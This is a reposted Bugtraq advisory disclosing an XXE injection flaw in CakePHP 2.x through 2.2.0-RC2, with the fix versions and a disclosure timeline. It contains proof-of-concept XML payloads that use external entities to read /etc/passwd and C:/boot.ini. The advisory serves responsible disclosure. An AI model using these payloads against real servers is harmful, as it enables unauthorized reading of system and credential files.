CakePHP 2.x-2.2.0-RC2 XXE Injection

看板Bugtraq作者pawel.時間13年前 (2012/07/17 02:01)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/1

# Exploit title: CakePHP XXE injection # Date: 01.07.2012 # Software Link: http://www.cakephp.org # Vulnerable version: 2.x - 2.2.0-RC2 # Tested on: Windows and Linux # Author: Pawel Wylecial # http://h0wl.pl 1. Background Short description from the project website: "CakePHP makes building web applications simpler, faster and require less code." 2. Vulnerability CakePHP is vulnerable to XML eXternal Entity injection. The class responsible for building XML (it uses PHP SimpleXML) does allow local file inclusion. 3. Proof of Concept Linux: <!DOCTYPE cakephp [ <!ENTITY payload SYSTEM "file:///etc/passwd" >]> <request> <xxe>&payload;</xxe> </request> Windows: <!DOCTYPE cakephp [ <!ENTITY payload SYSTEM "file:///C:/boot.ini" >]> <request> <xxe>&payload;</xxe> </request> 4. Fix Fix applied in version 2.2.1 and 2.1.5. See official security release: http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1 5. Timeline 1.07.2012 - vulnerability reported 13.07.2012 - response from CakePHP 14.07.2012 - confirmed and fix release

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 pawel. 的文章

文章代碼(AID): #1G15RVjF (Bugtraq)